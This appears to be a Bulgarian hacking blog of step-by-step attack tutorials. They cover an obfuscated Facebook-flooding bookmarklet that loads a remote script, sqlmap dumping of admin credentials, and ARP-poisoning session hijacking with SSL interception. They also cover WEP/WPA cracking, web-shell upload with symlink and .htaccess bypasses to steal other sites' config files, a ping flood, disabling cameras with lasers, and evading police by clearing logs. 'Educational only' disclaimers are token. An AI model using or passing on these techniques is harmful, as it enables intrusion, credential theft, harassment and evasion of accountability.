Flood във Facebook: Новия Timeline [HOWTO]

Следният начин за флуд на дадена стена/ timeline е много лесен, не изисква никакви специални умения в програмирането. Скриптът работи в Google Chrome, Mozilla Firefox, IE и др.

Как става? Трябва да отворите страницата/ timeline-а на жертвата в браузъра , след което въвеждате следния скрипт в адрес бара:

javascript:eval(String.fromCharCode(106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 58, 40, 97, 32, 61, 32, 40, 98, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 41, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 41, 46, 115, 114, 99, 32, 61, 32, 34, 47, 47, 98, 105, 116, 46, 108, 121, 47, 101, 78, 53, 113, 87, 97, 34, 44, 32, 98, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 97, 41, 59, 32, 118, 111, 105, 100, 40, 48, 41))

Появява се прозорец , който ще ви поиска съдържание, което да се поства на таймлайна заедно с колко съобщения да се заредят.

NukerBG НЕ отговаря за злонамерени деяния от страна на читателите на блога. Запазваме всички права за промяна на съдържанието на урока.

Инсталация на BackTrack R2 Gnome на Vmware

Инсталация на BackTrack5 R2 Gnome на VMware

1.Да кажа, че тази инсталация е специално за GNOME, при KDU има и разлики

2.Теглите си VMware Workstation

3.Теглите BackTrack 5 R2 в ISO,Gnome

4.Отваряте VMware Workstation след като сте я инсталирали.

5.Натискате на File > New Virtual Machine...

6. Избирате Typical > Next > Installer Disk Image File (iso) : избирате BackTrack-a > Next > Избирате Linux > Под него избирате Ubuntu / Ubuntu 64 bit > Next > Virtual Machine Name : BackTrack 5 (по избор) ,
Location : желателно е да има поне 20 gb free space , там където ще изберете. > Next > Maximum Disk Space : Не по-малко от 13. > Избирате Store Virtual Disk As A Single File > Next > Натискате Customize Hardware > Processors > Number Of Processors - 2 , Натискате Close > Finish

7. След като ви изпише "boot :" натиснете Enter

8. Като ви load-не екрана, изберете "BackTrack Text - Default Text Boot Mode"

9. След като зареди изчакайте 2 минути да ви изкара конзолата
Докато не изпише root@bt:~# не бутайте нищо. След като излезе напишете

startx


10. След като ви зареди пуснете "Install BackTrack"

11. English > Forward > Изберете времевата зона в която се намирате > Forward > Forward отново > Forward отново > Install. (ЩЕ ОТНЕМЕ ВРЕМЕ !!)

12. След като зареди, системата ще иска да се рестартира , цъкнете да се рестартва.

13. След като ви зареди screen-а в началото, ще ви иска bt_login и Password. bt_login-а е "root", password-a e "toor" (КАТО ПИШЕТЕ ПАРОЛАТА НЯМА ДА СЕ ВИЖДА)

14. След като ви зареди, пишете

passwd root

и напишете паролата която искате да бъде 2 пъти ..

15. Напишете startx

16. След като напълно ви зареди, изберете най-горе VM > Install VMware Tools...

17. На BackTrack-a ви трябва да се отвори една папка , копираите името на VMwareTools-........ (Файлът в дясно :D)

18. Отворете конзолата и напишете

cd /tmp

и Enter , после напишете

mkdir vm

и Enter

19. Oтворете нова конзола без да затваряте старата в новата напишете

cd /media/

и после Enter , после пишете

cd /media/VMware\ Tools/

и Enter. После пак пишете

cp VMwareTools-x.x.x-xxxxxx.tar.gz (името което копирахте) /tmp/vm/


20. Затворете конзолата.

21. Сега в началната конзола която не затворихте , пишете

ls

и Enter, трябва да ви изпише това което копирахте. Пишете


-tar -xzf VMwareTools-x.x.x-xxxxxx.tar.gz (това което копирахте)


22. След като зареди пишете

cd vmware-tools-distrib/


23. Напишете

ls

и Еnter , после напишете

perl vmware-install.pl

и Enter. Ще започне да ви пита разни неща , натискаите Enter на всяко ;)

24. След като зареди , напишете

cd ..

и Enter , после пак

cd ..

и Enter.

25. Напишете

-rm -rf vm*

и Еnter. След като зареди, напишете

reboot


26. Вече сте готови ! Ще ви иска bt_login и Password отново , напишете bt_login за "root" ( както винаги ще бъде) и Password ако не сте сменили паролата е "toor" (както почти винаги :D) След като зареди напишете startx . . . (винаги така се пуска BackTrack и всяка система на Linux)

27. Честит ви BackTrack 5 R2 !

Източник: cwi-group.org

SQLi чрез Backtrack

За начало пуснете backtrack и пуснете програмата sqlmap.Тя се намира в менюто
(Applications > BackTrack > Exploitation tools > Web exploitation tools > Sqlmap)
Следващото нещо което трябва да направим е да проверим сайта за грешки или по-точно за видими бази данни.Това е лесно.Въведете следния ред:
python sqlmap.py -u http://site.com/index.php?id=42 --dbs
След тази команда ще видите много резултати и малка таблица с имена на бази данни или ще изведе критични грешки, че сайта не уязвим.
Избираме някоя от дадените бази данни например DBNAME и пишем:

python sqlmap.py -u http://site.com/index.php?id=42 -D DBNAME --tables

Сега ще видим друга таблица показана и след като знаем това търсим колоната с администраторския акаунт и парола.

python sqlmap.py -u http://site.com/index.php?id=42 -D DBNAME -T TABLENAME --columns

Сега остава само да извадим нужната информация от колоната с тази команда : 

python sqlmap.py -u http://site.com/index.php?id=42 -D DBNAME -T TABLENAME -C COLUMNNAME --dump

Ако всичко е минало както трябва вече трябва да знаем администраторския account и криптирана парола(hash). Която 99% е md5 и не е особено трудна за разбиване. 
Ако сте получили тази информация Честито вие сте изпълнили вашата първа SQLi чрез тази популярна напоследак операционна система Backtrack .


Как да направим успешна Facebook група с много членове

Доста хора се питат този въпрос.Как да направим успешна Facebook група с много членове?

Много е важно да имате време което да отделите за развиването на групата.Като цяло трябва да имате идея какво точно искате от групата.Каква аудитория искате да имате.Каква ще е тематиката на групата.Ето няколко стъпки и съвета които е хубаво да прочетете за по-добро развитие на дадена група.

1.Името на групата е едно от най-важните неща както сами можете да се обедите в фейсбук има доста групи които са с над 20 000 члена само заради името.

2.Проучете какво върви.Търсете сензации нещо експлозивно.Нещо от новините което крайно не ви харесва и искате доста хора да го знаят.

3.Подържайте активност в групата за да не стигне тя един предел и да спре да се развива. Основно групите се развиват когато някой споделя ваши материали и неговите приятели ги виждат.Същото важи и за харесванията.

4.Изберете хубава снимка на групата също много важен избор

5.Попълнете хубаво и точно менюто информация.

6.Споделете групата с максимален брой приятели в предишна статия написах както точно да поканите всички ваши приятели без да ги избирате един по един.

7.Ако искате групата ви да е голяма можете да се регистрирате в трафик exchange сайтове там не е проблем за 1 седмица да направите група 20 000 човека.
Най-добрия такъв сайт е:
http://www.youlikehits.com  - Освен за фейсбук групи той е добър за subscribe на клип в youtube , twitter фенове , посещение на ваши сайтове ( трафик ) и доста други екстри. Точките се правят лесно и не е проблем да правите по 500 фена за час и половина.

Друга алтернатива на този сайт е :
http://www.claimfans.com/ref.php?id=51690 Добра алтернатива на предишния с около 60 000 абоната. Като предимство за него ще изтъкна ,че кредити се правят по лесно.

Последния съвет, който ще ви дам е накарайте максимален брой приятели да споделят групата или да поканят всичките си приятели вътре.

Как да поканим всичките си приятели в Facebook страница

Ето го и метода

1) Трябва ви Mozila Firefox минимална версия 6
2) Отваряте вашата Фен страница
3) Отваряте прозореца където се канят приятели
4) Цъкате на отметката all friends и въртите скрола докато не зареди всичките
5) Натискате тази комбинация ctrl + shift + K
6)  В показалия се прозорец въвеждате този код

elms=document.getElementById('pop_content').getElementsByTagName('li');
for(var fid in elms){if(typeof elms[fid] === 'object'){elms[fid].click();}}


Може да отнеме няколко минути докато прати поканите става бавно метода е от 14 ноември , но все още работи !


Коментари от рода на това не работи са излишни кода е проверен и работи за момента 07/03/2012г.

Как да получим достъп до диск C:// , ако е заключен ?

 
      Сигурно ви се е случвало да искате да проверите нещо на нечий компютър, но да разберете, че достъпът към диск C:// е ограничен ! Не се панирайте, имаме план Б . Сега ще ви разясним някои тънкости, които можете да използвате занапред.

НО ВИ ПРЕДУПРЕЖДАВАМЕ ! НЕ ТРИЙТЕ НИКАКВИ ФАЙЛОВЕ ОТ СИСТЕМНАТА ПАПКА ! НЕ ОТГОВАРЯМЕ ЗА ВАШИТЕ ПОСТЪПКИ. ВСИЧКО Е НА ВАША ОТГОВОРНОСТ !

За да се достигне до системния дял на Windows, могат да се използват няколко начина: Браузър , CMD , Linux и други. Ще се спрем на най-известните и най-лесните.

Метод #1 : Браузър: Mozilla Firefox / Chrome



Отворете Firefox или Google Chrome и напишете следното в адрес бара:


C:\

Това няма да ви позволи да отваряте файловете, но ще ви даде предимството да ги свалите. С други думи, нуждаете се от доста време, за да постигнете резултат с този метод.

Този метод се използва най-много като първа стъпка от друг метод, метода с CMD , като от браузъра можем да заредим пътя до файла и да го използваме в CMD.


Метод #2 : Command Prompt (CMD

Начин за Windows Vista и по-стари версии:
На някои компютри има ограничен достъп до notepad и cmd, от които се нуждаем. За да ги открием първо трябва да потърсим CMD в полето за търсене /start/ , за да видим дали е блокирано. Или отидете на 'C:\WINDOWS\system32\cmd.exe' или отидете в My Computer и потърсете за CMD с ctrl+f.
Вариант с notepad:
Отворете notepad и напишете 
command.com
Запишете като command.bat и като разширение : All Programs And Files . Уверете се, че го запазвате на работния плот.
Сега само отворете command.bat
Готово! Имате достъп до CMD !!! :)


Начин за Windows 7:
Отворете notepad, както на горния метод, само че вместо command.com напишете във файла:
@echo off
title CMD
:1
set /p a=%cd%^>
%a%
goto :1
Запазете като command.bat и го отворете. За да отворите диск C напишете C: 
А ако искате да отворите даден файл, първо трябва да намерите пътя към него чрез браузъра, и след това да напишете в конзолата : start C:\Windows\cmd.exe. Естествено можете да напишете на мястото Windows\cmd.exe пътя към файла, който искате да отворите. 

Това са начините за достъп чрез Windows , notepad и CMD.
Надяваме се урокът да ви е бил полезен.
Не отговаряме за вашите дейности, вие действате напълно на ваша отговорност.
Източници: hackforums/5ave

Как да подслушваме под Windows

В предишна статия ви показах как става подслушване чрез Back Track ,а в тази ще разберете как става  под Windows. За целта са ви нужни 3 програми ettercap , wireshark и cookie injector ( plugin ).
Ето и стъпка по стъпка как се прави.След инсталиране на 3-те програми пускаме ettercap и сканираме както беше показано в предишния урок.Добавяме нашия Gateway като таргет 1 ,а жертвите съответно като таргет 2 .Пускаме arp poisoning от менюто MITM и стартираме wireshark където пускаме sniffer-a за да следим пакетите.Във полето филтър въвеждаме : http.cookie contains "datr" и чакаме.От получените пакети с десен бутон copy->bytes->printable text only
Отваряме facebook отваряме Plugin на имe Cookie Injector и поставяме копирания преди това текст. Натискаме refresh и оставаме доста изненадани от резултата.

Видео : http://www.youtube.com/watch?v=4RHNSHiM0Hc

Използвайте урока само за учебна цел.

Backtrack - как да подслушваме мрежи с SSL криптиране

Вече видяхте няколко урока за Back Track как да го инсталирате и какво можете да правите с него.Сега ще ви покажа още едно предимство на Back Track и програмата ettercap.Използвайте материала само за учебна цел.

Много от по-големите сайтове като yahoo facebook и други използват криптирана връзка между вас и сървъра и това затруднява подслушването на мрежата.В този урок ще ви покажа как да я подслушвате дори когато има тази SSL криптирана връзка.
Отворете папката etc и намерете файл с името etter.conf
Намерете по-доло следните редове:
#---------------
# Linux
#---------------

# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


Сега трябва да премахнем два символа # за да позволите на командата redir да работи в ip таблиците 
Променете това :

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


Да изглежда така:

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Запазете файла така и отворете програмата ettercap -> privilege escalation -> protocol analysis-> network sniffers -> ettercap-gtk

След това изберете Sniff и unified sniffing.Изберете вапия интерфейс в моя случаи wlan0 


Следващата стъпка е да сканирате за хостове Hosts > Scan for hosts

След това пуснете списъка с хостове.Като target 2 изберете рутера ,а target 1 са ви жертвите 

Цъкнете на MITM > Arp poisoning  и цъкнете на отметката sniff remote connections 

След това натистенете старт и чакайте жертвате да въведе някаде парола.

Ето линк където можете да видите как точно се прави ТУК

Част №3 Wireless мрежи - WPA

ЧАСТ 1 (Wireless мрежи - Въведение) : ТУК
ЧАСТ 2 (Wireless мрежи - WEP) : ТУК

Както вече споменахме за този метод ви трябва wordlist колкото по-голям е той толкова по-голям шанс да успеете можете да намерите доста такива в интернет.
airmon-ng start wlan0 и сканирате мрежата с airodump Както показах в предишната статия.Оставяте го за няколко секунди и намирате подходящата мрежа.В нашия случаи тя е SKIDHACKER 

airodump-ng -c (channel) -w (filename) --bssid (bssid) wlan0 .Важно е да запомните името на файла ще ни е необходим в края.
За да получим паролата за WPA wireless ни трябва нещо наречено Handshake , можем да го получим като изритаме някои които вмомента е в мрежата с тази команда.
aireplay-ng -1 0 -a (bssid) wlan0 - заменете с вашата стойност за bssid
Когато вече имаме wpa handshake файла трябва да го кракнем.Спираме сканирането с натискане на контрол + С в тернималния прозорец където е пуснат airodump.Намираме файла .cap които е в горното меню Places > Home Folder .След това отваряме терминала и пишем тази команда aircrack-ng -w (wordlist файла които преди това сме свалили) /root/(файла в които сме записали handshake ). Това може да стане и като завлечете файла в терминалния прозорец . Натиснете ентер и запомнете по-голям wordlist по-голям шанс за вас.








Част №2 Wireless мрежи - WEP

ЧАСТ 1 (Wireless мрежи-въведение) : ТУК
ЧАСТ 3 (Wireless мрежи-WPA) :  ТУК 

Сега вече можем да преминем към съществената част от нашата задача.Първо стартирайте Back Track и отворете терминален прозорец.След това напишете airmon-ng за да видите интерфейсите на картата в моя случаи това е wlan0 с командата airmon-ng start wlan0 ние преминаваме към монитор мод на дадения интерфейс.

След това използваме командата airodump-ng за да сканираме за мрежи.Както виждате имаме налична мрежа с името SKIDHACKER важно е да се отбележи BSSID , канала , вида криптиране сега ще покажем как става с WEP






Сега използваме командата airodump-ng -c (канал) -w WEPcrack --bssid (bssid на мрежата) wlan0 ето и какво представлява тази команда започваме да сканираме конкретната мрежа -c отбелязваме канала -w посочваме къде да се запише информацията –bssid посочваме коя точно мрежа да сканира ,а wlan0 е инферфейса
 
Отворете нов терминал и напишете следната команда за да започне по-бързото събиране на дата пакети aireplay-ng -1 0 -a (bsisd) wlan0 сега ако всичко е наред трябва да ви изпише Association successful :-)
Следващата команда която трябва да използвате във същия прозорец е
 aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) wlan0 когато ви попита дали искате да я използвате напишете Y и ентер.
След като съберете дадено количество дата пакети (препоръчвам над 20 000 ) напишете следната команда aircrack-ng WEPcrack*.cap името може да е различно това е използвано в примера . Ако не стане от първия път изчакайте повече пакети.



Когато се покаже този резултат KEY FOUND! [ XX:XX:XX:XX:XX ] значи всичко е готово X е паролата и ако като пример получите 11:22:33:44:55 то паролата е 1122334455 без : .

Моля използвайте получената информация само за учебна цел .В следващата статия ще разберете как става с WPA 






Част №1: Wireless мрежи - Въведение

Напоследък доста хора използват wireless връзка за своите нужди. Тя става все по-популярна в България и по света.Тенденциите са тя да се развива от към скорост и обхват. Вече дори и мобилните оператори предлагат такава  ,но за жалост е твърде слаба.Смятам ,че тази интернет връзка трябва да е свободна за всички потребители и да има повече места където можете да сте в мрежата като например паркове , пред някой магазин , пред някой блок дори когато вървите из целия град в които живеете.В тази статия ще ви покажа няколко метода които можете да използвате за мрежа която има парола.В интернет има доста такива статии ,но ще се опитам да вдигна малко нивото като се опитам да направя един разбираем  урок и ще изтъкна проблемите които можете да имате при изпълнение на урока от тази статия.Незабравяйте ,че това е незаконно и го използвайте само с учебна цел.
Въведение
Wireless мрежа е безжична и всички потребители които имат достъп до нея се наричат Stations (станции) , те могат да са access points ( APs ) или клиенти .APs са компютрите предоставящи тази връзка рутери  ,те получават информацията с която комуникирате в интернет.Всичките станции комуникират със себе си посредством Basic Service Set ( BSS).Всеки BSS има идентификация която се нарича BSSID , също така наречена MAC адрес  ,който е уникален за всяка карта.За да сте вързани към мрежата вие трябва също така да знаете нейното име което е SSID за да можете да получавате и изпращате пакети за комуникация.
Криптиране на Wireless мрежа
Два са основните метода за криптиране WEP и WPA/2 . WEP е съкратено от Wired Equivalent Privacy  и е с 3 различни по дължина ключове които са 64 , 128 и 256 бита съответно WEP64/128/256 . Предлага добра сигурност ,но е доста остарял метод съответно и по-лесен за разбиване.Всеки WEP ключ има 24 инициализиращи вектора  ( IV ) . WEP също така може да бъде WEP2 и WEP+  които не са толкова лесни както стандартния WEP . WPA ( WiFi Protected Access ) се появява по-късно за да подобри защитата на мрежите  които преди това са използвали WEP . WPA прави собствена различна парола за всеки клиент , но доста често се пуска не като защита разбира се pre-shared key ( PSK ) мод при които всеки клиент има една и съща парола.
Основни проблеми при разбиването на Wireless парола
WEP криптирана парола не би затруднила дори и 13 годишен със сравнително не големи познания  ,но има своите изисквания за да бъде разбита паролата трябва да има трафик в дадената wireless мрежа за да намерите бързо векторите и да получите паролата .Доста често хората се отказват  като мислят ,че проблема е някъде при тях.Също така е желателно да имате добър сигнал към тази мрежа  ( 1 черта не е добър сигнал ) .
WPA основния проблем там  е ,че за да проникнете в такава мрежа ви е нужен файл наречен wordlist в повечето случаи се прави собствен такъв или се намира от интернет големината му варира от 100 mb до 100 и повече GB . Какво представлява файла , ами това е файл със комбинации пароли  и обработването му може да бъде доста дълго зависимост от вашият компютър и програмите които използвате.Друг метод е да bruteforce-нете паролата това е когато пробвате всяка една комбинация която е възможна.Искам да дам следния пример : парола WPA криптирана от 8 символа  има 64 на 8ма степен комбинации.Това прави 64*64*64…….= 281 474 976 710 656 това са 281 трилиона комбинации със програмата която ви показват в други уроци  наречена aircrack вие можете да постигнете скорост от 1500-3000 пароли в секунда ( зависи от компютъра ) . За примера ще използваме 3000 пароли в секунда  * 60 * 60 * 24 * 30 … за един месец можете да обработите 7 776 000 000  . 7 милиарда пароли спрямо числото 281 трилиона комбинации. Сигурно вече съвсем се разубедихте , но не се отчайте има програми с които може да се постигнат и много добри резултати като например Pyrit  ,който достига скорост от 50 000 пароли в секунда до 150 000 . Използва вашата видео карта и е един от най-добрите методи.

Какво ще ни е необходимо да използваме
В тази статия ще покажа  двата най-често използвани метода  за WEP и WPA  чрез Backtrack  вече сигурно сте прочели статията как да го инсталирате на преносим източник или на вашият твърд диск .Подходяща wireless карта  ,повечето нови карти са добри за тази цел. Търпение и нищо друго.


Нататък:
ЧАСТ 2 (Wireless мрежи - WEP) : 
ТУК
ЧАСТ 3 (Wireless мрежи - WPA) : ТУК

Hackthissite.org - Играйте и учете едновременно

"Hackthissite"
В днешната статия искам да ви покажа един много хубав сайт, в който се регистрирах преди време. Много е интересна тематиката на сайта. Той представлява игра, в която вие сте хакер и ви се дава дадена мисия. Разделени са на нива като се започва от най-лесното. Ще са ви нужни някои допълнителни плъгини за Mozilla/Chrome. Ако се затруднявате с някоя от задачите има много сайтове в google където ви дават подробно как се минава конкретната мисия ,а също така и в youtube има клипове.

Регистрирайте се и се забавлявайте ТУК

*Ако имате затруднения относно някое ниво, винаги можете да питате за помощ долу в коментарите. Няма да бъде отказана такава!

Backtrack – От А до Я част 1

Официален сайт на Backtrack ТУК

Напоследък доста зачестява интереса към тази не толкова популярна операционна система и реших да напиша подробен урок какво представлява Backtrack , как се инсталира , за какво се използва , какви програми съдържа и друга полезна информация за тази уникална операционна система.

1.Въведение – Backtrack е операционна система базирана на Ubuntu GNU/Linux  използва се от мрежови администратори, собственици на сайтове, хакери и хора които искат да научат повече за Linux. Backtrack е проект обединен от две организации които се занимават с penetration testing.

2.Инсталация – Може да бъде инсталиран на вашият твърд диск и да работи заедно с Windows , а също така и да се работи с него директно от USB флаш памет  (изискване да е над 4GB ) .

2.1 Инсталация директно на твърдия диск
Това е най-простия метод за инсталация когато целия твърд диск е изцяло за BackTrack .
Boot-нете Back Track за да се инсталира . След като сте го заредите с командата startx получавате KDE графичен интерфейс.
След като вече сте го заредили двоен клик с левия бутон на мишката върху install.sh или въведете в терминален прозорец командата ubiquity

Изберете географско положение и натиснете forward


Следващото меню е относно дяловете на твърдия диск изтрийте всички и започнете инсталация на Back Track . Следвайте стъпките които са доста лесни и след приключване на инсталацията рестартирайте.Стандартната парола и username в Backtrack са root / toor . 

2.2 Инсталация на LIVE USB -  За целта трябва да имате флаш памет минимум 4GB форматирана с FAT32. Свалете програмата от ТУК казва се unetbootin . Изберете ISO файла на Back Track ( съвет : изберете последна версия ) . Изберете USB устройството което мислите да използвате . Паролата за backtrack е същата командата за графична среда е startx .

3.Списък с основни програми които са включени в Backtrack


Metasploit
RFMON
 Aircrack-NG
Kismet
Nmap
Ophcrack
Ettercap
Wireshark
BeEF
Hydra
OWASP Mantra Security Framework - огромна колекция от програми / скриптове  и друго

BackTrack разделен в 12 категории:
Information Gathering
Vulnerability Assessment
Exploitation Tools
Privilege Escalation
Maintaining Access
Reverse Engineering
RFID Tools
Stress testing
Forensics
Reporting Tools
Services
Miscellaneous

Как да забраним даден сайт на нашия компютър

Много често познати които са родители и се притесняват за децата си каде се ровят в нета и се страхуват да не попаднат на материали за възрастни ме питат как да се предпазят от това.Има доста програми за тази цел ,но сега ще предложа един метод ,който е много лесен дори за човек без особени познания в тази област да забрани дадени сайтове.
Следвайте тези инструкции :
1.Отворете папката C:\WINDOWS\system32\drivers\etc
2.Намерете файл с името HOSTS
3.Отворете го с notepad
4.Сега в файла под реда 127.0.0.1 localhost добавете нов ред 127.0.0.2 http://www.facebook.com
5.Запазете файла със Save
Сега се опитайте да отворите страницата на facebook :) Ако нестане значи сте се справили отлично

Как да разберем вида на дадена Hash парола

В днешната статия ще ви покажа много хубава програма абсолютно безплатна с която можете да разберете вида на дадена парола как е криптирана няма да се впускам в дълги пояснения за програмата защото тя е доста лесна ще дам само screenshot и линк за връзка

Линк за програмата : ТУК

Как действат хакерите? -Всичко от А до Я


Повечето от тях са деца които използват готови завършени грешки ,но има и такива които сами откриват грешки в дадена система.

Първото и най-важно нещо е да изберете вида на атаката която ще използвате най-често тя е SQLi  има много сайтове с грешки . И лесно се намират с гоогъл . Можете да прочетете повече за този вид атака ТУК или ТУК

Намирате сайт в  ,който има SQLi уязвимост

Да предположим ,че в конкретния сайт няма грешка но ние искаме да го хакнем още е рано да се отчаяме.На дадена машина доста често се срещат 2 и повече сайта.Можете да проверите тези сайтове като въведете това ip:22.333.444.555 id=  в bing.com или google.com ще излезнат сайтове всички сайтове които са качени на този компютър.Ще останете изненадан от резултатите.

С методите които сигорно вече сте прочели трябва да си набавите достъп и да се логнете като администратор на сайта.

Следващата стъпка е да качите шел има много начини и за всяка система начина е различен вие трябва да търсите информация как точно става за конкретната система най-често се сменя името на шела да бъде с разширение .jpg и когато го качим го променяме на .php защото доста сайтове имат защити от upload на такъв код. 

При Root на дадена машина трябва да се премахнат всички възможни защити скоро ще пусна статия как става това.

Много важно нещо е да знаем  версията на линукс можем да я проверим с командата  uname -a

Трябва да намерите локален експлойт за дадената версия можете да проверите тук

Следващата важна стъпка е да влезнете в shell-a и да напишете тази команда 
cat etc/passwd този файл съдържа всички username-и на хоста те не са дълги както е името на саита  ,а са нещо от рода на  сайт1 сайт2 сайт3

Основна цел след това ви е да получите конфигурационния файл на системата ето места където се намира той при някои системи.


vBulletin -- /includes/config.php
 IPB -- /conf_global.php
 MyBB -- /inc/config.php
 Phpbb -- /config.php
 Php Nuke -- /config.php
 Php-Fusion -- config.php
 SMF -- /Settings.php
 Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
 Drupal -- /sites/default/settings.php
 Oscommerce -- /includes/configure.php
 e107 -- /e107_config.php
 Seditio -- /datas/config.php

След като сте получили пътя до база данните основна цел ви е да извлечете базата данни

Нека приемем ,че сте в директорията /home/attacker1/public_html/shell.php  attacker1 е username-а на някакъв хост.Пътят до жертвата е нещо от рода на /home/victim1/public_html/ и victim1 е вашето име на жертвата.Сега ползваме тази команда в шела като приемаме ,че системата е vBulletin :
ln -s /home/victim1/public_html/includes/config.php victim1.txt

Тази команда използва symling ( ускорява работата на линукс сървъри ) и казва на сървара : хей дай ми този файл и го запиши като victim1.txt .Сега когато изпълним това можем да видим конфигурационния файл на този адрес attacker1.com/victim1.txt  .Много администратори слагат защита на техните сайтове / форуми която ще пробием след малко.

Htacces. - Администратора на сайта victim1.com може да е сложил htacces file в папката /includes

order allow, deny
deny from all


Когато се опитаме да копираме ще получим грешка 403 Forbidden Error. Как ще го преминем.Ами правим папка примерно "asd",влизаме вътре с командата cd /asd След това прилагаме symling ln -s /home/victim1/public_html/includes/config.php victim1.txt

Получаваме 403 Forbidden Error . Сега трябва да сложим htaccess файла в директория преди "asd"за пример ако ние сме в /home/attacker1/public_html/asd и ние трябва да сложим htaccess в предишна папка в /home/victim1/public_html/" . В htaccess файла трябва да напишете HeaderName victim1.txt

Сега насочваме към "home/attacker1/public_html/asd и кликаме на victim1.txt и трябва да ни зареди конфигурационния файл.

Ако ви е писнало от всички преминавания на защити ще ви покажа хубав метод с които да преминете през всички.
Следвайте този пример:
Спрели сме всички защити,но все още неможем да направим symlink правилно.Какво да правим.
Първо правим папка с произволно име примерно hack . Влизаме вътре през шела и пишем вътре "ln -s / root" . След това избираме домейн адреса на жертвата например victim1.com . Пишем "ls -la /etc/valiases/victim1.com" .Сега се насочваме една папка назад и слагаме този htaccess файл в папката hack :

Options Indexes FollowSymLinks
DirectoryIndex test.htm
AddType txt .php

AddHandler txt .php.
Сега ако сме в "home/attacker1/public_html/" това е равно на "attacker1.com" . Затова искаме да насочим към папката " hack " и пишем в URL attacker1.com/hack и ние виждаме папка която всъшност е symlink връзка наречена root . Не се радвайте още , имаме ограничени права в същата папка . Сега минете през attacker1.com/hack/root/home/victim1/public_html/ 
Сега можете да разглеждате сайта без да се тревожите от ограниченията по IP адрес с htaccess файл. Дори да е там htaccess няма проблем защото вие сте въвели username и парола , трябва да намерите начин  да преминете това . След като стигнете до конфиг файла не се отчайваите ако видите празна страница десен бутон и view source . 

Как да Flood-нем компютър без никакви програми

Всичко е много просто и обяснено в 4 стъпки

1.Отваряте Notepad

2.Пишете " Ping -t -l 7500 (Ip адрес на жертвата) "   -t ще пуска пинг докато не бъде спряно -l е размера на Пинг пакета . Ip адреса се сещате какво е :)

3.Записвате текста с разширение .bat  пример :  flooder.bat

4.Пускате го и гледате резултата ако не е особено добър можете да увеличите размера на пакетите

Не очаквайте особени резултати това е обикновен пинг ,но е достатачно да забави и изнерви някои в Wireless мрежа :) Очаквам вашите коментари Благодаря за прочетената статия.

Как да обезвредим камера


Моля използвайте материала само и единствено за образователна цел

Първото нещо което ни трябва е зелен лазер 5 mW  като ТОЗИ тук след това насочвате лазера за около 10 секунди в обектива на камерата . Не рискувайте с повече най-вероятно ще я повредите  имате около 30 секунди докато възстанови способностите си да вади образ . 



Как да хакваме и да не ни хващат

Първо искам да започна с това ,че в предишна статия споменах няколко програми които доста добре ни правят донякаде анонимни в интернет ТУК .
Но това което сте прочели в предишната статия не е напълно достатачно.Така ето и няколко съвета от мен дано ви бъдат от полза.

1.Никога не оставяйте никакви следи в интернет които могат да доведат полицията до вас.Доста често остават Логове по компютъра , Логове във VPN мрежата и други.Подсигурете се да изтриете всичко което може да наруши вашата анонимност.

2.Мързела доста често е една от причините да бъдете хакнат независимо какво се има впред.Използвайте хубави проксита и VPN сървъри и ЗАДЪЛЖИЛНО ... НИКОГА АБСОЛЮТНО НИКОГА не правете нищо незаконно от ваш интернет.Отделете малко време и изпиите едно кафе в някое интернет кафе , заведение , или пред някой блок където сте намерили безплатен или хакнат от вас Wireless.

3.Запомнете ,че в повечето случаи когато даден саит или важен акаунт бъде хакнат собственика му може да провери вашето ISP и да получи информация за вас

4.Повечето хора които отскоро се занимават в повечето случаи искат да станат доста бързо известни и да се прочуят в средите и забравят за собствената си безопасност в повечето случаи от мързел и бързане.

5.Никога не споделяите на публично места вашите изяви , понякога и стените имат уши и никога незнаете човека ,който стои близо до вас какво работи.

6.Използваите псевдоним с ,който ви знаят само най-близките и доверени хора.

7.Не си правете срещи с непознати от интернет ако не сте на 100% убедени в тях.

8.Не хакваите за щяло и нещяло изградете си цели.Повечето хакерски групи имат мотив и цел към която се придържат и никога не бягат от целта.Ако компютърат ви е хакнат тои него е направил защото иска да ви навреди ,а иска да помогне на себе си и да навреди на други хора.Естествено последното е изключение ако имате 1000$ в пейпал и се чудите какво да ги правите тогава той би ви помогнал да ги изхарчите.

9.Запомнете най-важното Хакери винаги е имало в затвора и винаги ще има всичко зависи от вас.

Ето как да изтриете логовете в Windows :
Start > Control Panel > Administrative Tools > Event Viewer > Clear All Events

Топ 10 на най-лошите компютърни вируси!

Компютърните вируси могат да бъдат истински кошмар. Някои могат да изтрият информация от хард диска ви, да натоварват мрежовата ви връзка с часове, да превърнат обикновена машина в зомби и да се множат и разпространяват по останалите компютри. Ако никога не сте ставали жертва на компютърен вирус, може да се чудите за какво е всичко това. Но загрижеността е разбираема – компютърните вируси са довели до $8.5 милиарда загуби през 2008 г. Те са един вид онлайн заплаха.



Компютърните вируси съществуват от много години. Всъщност, през 1949г. учен на име Джон вон Нюмън изгражда теорията, че саморазмножаваща се програма е възможна. Компютърната индустрия е била на няма и десет години и вече някой е открил как да и създава проблеми. Но все пак отнема няколко десетилетия преди програмисти, познати като хакери, да започнат да правят вируси.

Студентът Фред Коен е бил първият, описал саморазмножаващите се програми, направени за да модифицират компютрите като вируси. От там идва и названието им.

